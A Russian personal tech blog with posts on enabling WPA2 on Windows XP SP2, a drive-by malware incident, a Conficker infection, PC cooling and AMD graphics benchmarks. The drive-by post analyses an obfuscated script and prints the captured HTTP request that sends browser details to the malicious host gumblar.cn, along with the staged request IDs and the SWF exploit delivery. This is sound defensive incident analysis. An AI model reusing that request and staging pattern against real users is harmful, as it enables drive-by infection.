WPA2 на Windows XP SP2

Кто-то может сказать, что тема WiFi под Windows XP SP2 сейчас не актуальна. В общем да, но среди домашних машин вполне можно встретить и более древние экземпляры ОС от M$. Так к чему это я?

Часть первая, практическая.

Исходное состояние дел:

• работает домашняя точка доступа ASUS WL-500W, включен WPA2-PSK
• 2 ноутбука подключаются нормально (Win XP)

Решил на днях подключить к WiFi-сетке еще ноут Acer 5110 WLMi, сетевая карточка Atheros 5005.

Хоть при автоопределении сети, хоть при ручном задании - коннекта нет. "Не-не-не!" - отвечает винда. Подключение не устанавливается, и после каждой попытки сваливаются настройки аутентификации с WPA Pre-shared key на 802.1X (TLS/PEAP).

Следующим шагом обновил драйвер (был за 2006 год) - и что же? "Не-не-не!" - опять говорит мне винда: "Windows is unable to connect to the selected network. The network may no longer be in range. Please refresh the list of available networks, and try to connect again". Но настройки уже не слетают.

Дальше в помощь google. Выяснилось, что Win XP SP2 не поддерживает WPA2. Вот только тогда я вспомнил, что WPA != WPA2 : )
И после установки фикса KB893357 ноут стал нормально коннектиться к сетке с WPA2.

Часть вторая, теоретическая.

Вопрос отчасти риторический. Почему ноутбук без поддержки WPA2 пытается подключиться к сети с защитой WPA2 и ведет себя неадекватно: соединение выдает ошибку или просто тихо не устанавливается, вместо того, чтобы указать - "неподдерживаемый протокол"?

На момент создания Win XP SP2 было 2 механизма защиты wireless сетей:
- на базе WEP (включая полностью открытую сеть с отсутствием защиты)
- на базе WPA.

WPA - это по сути ранняя и облегченная версия стандарта 802.11i.
WPA2 - это уже полноценный 802.11i 2004 года.

Как известно, типичная практика (и не только в сетях): включать в протокол версионность.
WPA и WPA2 - ранняя и финальная реализации 802.11i соответственно - согласно стандарту включают в поле version значение 1. Таким образом, тупо проверить версию и уведомить пользователя о неподдерживаемом протоколе не получится. Нужно проводить дальнейший разбор.

Если разработчики Win XP SP2 действовали по принципу: "всё что не WEP - то WPA" - становится понятным, что начиная с какого-то момента в процессе аутентификации станция продолжает действовать согласно WPA, тогда как точка доступа ожидает поведения в стиле WPA2. Точка доступа тихо отбрасывает несоответствующие кадры, станция продолжает их отсылать - и по истечении таймаута пользователь получает сообщение: "Товарищ, сеть больше не видна". Что и наблюдалось на практике.

И в догонку пара ссылок: wiki про WPA, стандарт IEEE 802.11i.

Китайские хакеры и с чем они едят Firefox.

Утром прошлого воскресенья встретился с кознями китайцев.

Загружаю страничку с одного хорошего зарубежного сайта по астрофотографии. Кликаю по ссылке как обычно - открыть страницу в бэкграунде. Дело происходило в FF 3.0.3. Я ничего не подозреваю.
И тут Каспер выдает в трее:
- файл "такой-то.exe" помещен в группу "Слабые ограничения"
- файл "сякой-то.bat" помещен в группу "Слабые ограничения".

Я на стреме щелкаю только загруженную страничку, файрфокс пишет: "Could not launch Acrobat".
При том шо страница простая как репа: несложно форматированный текст, табличка да несколько картинок. Нет анимации и прочего мультимедиа-шлака.

Дальше исходный код странички. Виден веселый тег script с операторами eval(), unescape(), replace() и невнятной чушью внутри. Знач
ит код закодирован. Остается выяснить - насколько хитро. Оказывается, нехитро.
Пишу вместо eval - alert и радуюсь раскодированному тексту скрипта.
Дальше - запустить скрипт, wireshark и наблюдать. Вторжение идет по простой схеме.

Шаг 1.
При открытии страницы выполняется скрипт:
- собирается ID браузера и ОС
- генерится User-agent и прочая инфа
- всё это отсылается на gumblar.cn/rss.xml?id=<число>
Число отвечает за стадию "затрояненности", на которой находится машина (выяснилось позже). На первом шаге это значение id - пустое.

GET /rss/?id= HTTP/1.1
Host: gumblar.cn
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3 (.NET CLR 3.5.30729)
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://<исходная_хорошая_страничка>
Cache-Control: max-age=0

Всего встретились:
- Стартовый запрос /rss/?id=
- Промежуточные запросы /rss/?id=2, /rss/?id=3 в ходе которых подгружается еще один скрипт
- Последний /rss/?id=11&0

Шаг 2.
Китайский веб-сервер смотрит инфу от клиента и передает в ответ подходящий эксплойт. В моем случае это оказался баг обработки SWF (в FF или вообще в Adobe).
Так что после запроса /rss/?id=11&0 сервер выдает зловредный swf-файл. Название файла каждый раз новое, но содержимое постоянно.

Content-Length: 16570
Content-Disposition: inline; filename=vA.swf
Content-Transfer-Encoding: binary

Браузер колбасится, потом выполняется эксплойт, который и скачивает exe- и bat-файлы на c:\ И запускает их.

Шаг 3.
Больше ничего не случилось. Наверное оказалось недостаточно привилегий: я все браузеры запускаю через DropMyRights с пониженными привилегиями.
Обновил FF и Каспера. Сомнения остались: ведь загруженные файлы были запущены и выполнились 1 раз. Есть исчезающе малая вероятность, что троян очень хорош :) и Каспер, Process Explorer, RKU, Gmer и другие его не видят.
Прошла неделя - и никаких признаков зверя в системе нет.

Послесловие.
На сайте посмотрел e-mail автора, отправил ему алерт. Он ответил в тот же день вечером: поблагодарил и, говорит, полгода назад на хостинге уже был "security breache", после которого всем выдали новые пароли. Се ля ви.

conficker.c

В нашем домене поселился замечательный сосэд: http://mtc.sri.com/Conficker/addendumC/

Предыстория.
Машины в сети пропатчены, с антивирусом. Все равно в system32 постоянно появляется кидо, под разными именами. Отлавливается антивирусом, но все равно неприятно. Filemon не регистрирует его появления: не было в systemp32, потом появляется (имя постоянное, но разное на разных машинах. На моей например omrylg.b).
И еще: осталась всего пара Win2k машин, одна из них - резервный DC.

История.
Поведение того DC, который под win2k, мне не нравилось: снифф проходящего через центральный коммутатор трафика показывал ARP-запросы на невыделенные IP-адреса. Пару недель назад я его смотрел, был чистым.
Сегодня: kidokiller.exe, procexp.exe, tcpview.exe - запускаются и сразу закрываются. Дело нечисто. Диагноз приведен в начале поста.

За сим - хэппиэнд.

Winter Cooling

Вытащил-таки тварь на балкон :) Я про домашний компьютер. Он работает практически в режиме сервер+HTPC и редко выключается.
Так что пускай на балконе гудит-шумит, пока лето не наступит. А там посмотрим.

А вот что показывает мониторинг Everest'а:

Производительность видео: сравнение AMD/ATI 2600, 3300 и 4850

По ходу апгрейда домашнего компьютера сделал на одной платформе сравнительное тестирование разных видеокарт от AMD/ATI: встроенное видео 3300 и дискретные карточки Radeon 2600XT и 4850.

Конфигурация системы:
- материнская плата Biostar TA790GX 128M (обзор)
- трехъядерник AMD Phenom X3 8650 2.3 GHz
- 2GB DDR2-800

Видео:
1. Встроенное в чипсет AMD 790GX видео (mGPU) HD3300 с памятью SidePort 128 Mb
Режим: Default (GPU 650MHz, VRAM DDR2 400MHz)
2. Asus EAH2600XT с 256 Mb DDR3 128 bit
Default: GPU 800 MHz, VRAM 700 MHz
Режим: разгон перепрошивкой Video BIOS до GPU 837 MHz, VRAM 891 MHz (не предел - гонится еще дальше, но в биос не решился зашивать предельные значения).
3. MSI R4850-T2D512 с 512 Mb DDR3 256 bit
Режим: Default (GPU 625 MHz, VRAM 1000 MHz)

Не мудрствуя лукаво, взял 3DMark2006 и прогнал в стандартном разрешении моего Samsung LE32R71 1360x768 в двух режимах: без сглаживания и анизотропной фильтрации (noAA, noAF) и с полным сглаживанием и анизотропной фильтрацией (8AA, 16AF).

Дальше - результаты графических тестов (кадры в секунду, FPS):
- 4850, 2600, 3300 в режиме noAA, noAF;
- 4850 и 2600 в режиме AA8, AF16.
Выполнять нагруженный тест на 3300 я даже не стал.




Графики говорят сами за себя.
Приятно, что на 3300 можно запускать даже тяжелые игры в минимальных настройках.

И радует, что на 4850 даже включение максимального уровня антиалиасинга и анизотропной фильтрации оставляет FPS на нормальном уровне.
Вот только греется карта по сравнению с 2600 намного больше. Для 2600 было: 45 в простое, до 60 под нагрузкой. На 4850 по дефолту было 80 в простое. Подкрутил настройки кулера RivaTuner'ом - стало 55-60 градусов, до 80 в игре.

Что касается тестов CPU Red Valley, они дали одинаковые результаты по каждому видео (test1: 0.9 FPS и test2: 1.4 FPS), подтверждая, что с разными картами одного производителя получаются одинаковые результаты CPU-теста.

Я вообще рад за AMD. Если брать сбалансированный компьютер, а не гнаться за гигагерцами, AMD - это лучший выбор.
Ожидаю сегодня ноут с Athlon X2 на платформе 780M со встроенным видео 3200. Сейчас на руках ноут Intel со встроенным X45. Так что впереди тест двух ноутов 2008 года и холивар AMD vs Intel!